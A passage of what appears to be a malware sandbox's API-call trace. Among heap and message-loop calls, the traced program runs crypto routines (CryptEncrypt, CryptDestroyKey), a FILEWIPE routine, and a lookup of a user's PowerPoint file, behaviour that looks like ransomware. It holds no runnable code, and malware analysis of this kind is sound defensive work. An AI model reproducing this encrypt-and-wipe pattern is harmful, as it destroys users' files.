| out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0171.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.141] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.141] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0171.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.141] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.142] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0171.142] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.142] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.142] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0171.142] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.142] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.142] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0171.142] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.142] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.142] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.143] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.143] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.143] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.143] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.144] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xa7c0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xa7d0) returned 1 [0171.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.144] CharLowerBuffW (in: lpsz="byte[42961]", cchLength=0xb | out: lpsz="byte[42961]") returned 0xb [0171.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.145] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.145] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.145] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.145] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9cfe88*, pdwDataLen=0x87e820*=0xa7c0, dwBufLen=0xa7d0 | out: pbData=0x9cfe88*, pdwDataLen=0x87e820*=0xa7d0) returned 1 [0171.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.146] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.146] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.146] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.146] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.146] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.146] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0171.146] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0171.146] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.146] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.146] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.146] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0171.146] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.146] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.146] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.149] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.149] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.149] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.155] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.155] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.155] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0171.155] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.155] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.155] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0171.155] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.155] CryptDestroyKey (hKey=0x90aed8) returned 1 [0171.162] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.162] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.162] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0171.162] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0171.162] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0171.162] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0171.162] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0171.162] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0171.162] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.162] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0171.163] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0171.163] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0171.163] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.163] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.163] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.163] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0171.163] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.163] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0171.163] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.163] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.163] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.163] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.163] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0171.163] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.163] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0171.163] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0171.164] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0171.164] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.164] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0171.164] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.164] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.164] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0171.164] FreeLibrary (hLibModule=0x74f20000) returned 1 [0171.164] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.164] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.164] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.165] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.166] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.173] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.173] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0171.173] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.175] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.175] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a79df10, ftCreationTime.dwHighDateTime=0x1d57a75, ftLastAccessTime.dwLowDateTime=0x111572f0, ftLastAccessTime.dwHighDateTime=0x1d59c76, ftLastWriteTime.dwLowDateTime=0x111572f0, ftLastWriteTime.dwHighDateTime=0x1d59c76, nFileSizeHigh=0x0, nFileSizeLow=0xa7c0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="k55L_7uM1tYjpSGA.pptx", cAlternateFileName="K55L_7~1.PPT")) returned 0x90ae18 [0171.176] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0171.176] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.176] CharLowerBuffW (in: lpsz="byte[42944]", cchLength=0xb | out: lpsz="byte[42944]") returned 0xb [0171.177] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.177] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0171.177] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.177] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0171.177] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0171.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0171.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0171.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0171.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2688 [0171.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2688, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0171.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0171.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0171.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0171.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0171.178] FreeLibrary (hLibModule=0x75c90000) returned 1 [0171.178] PeekMessageW (in: 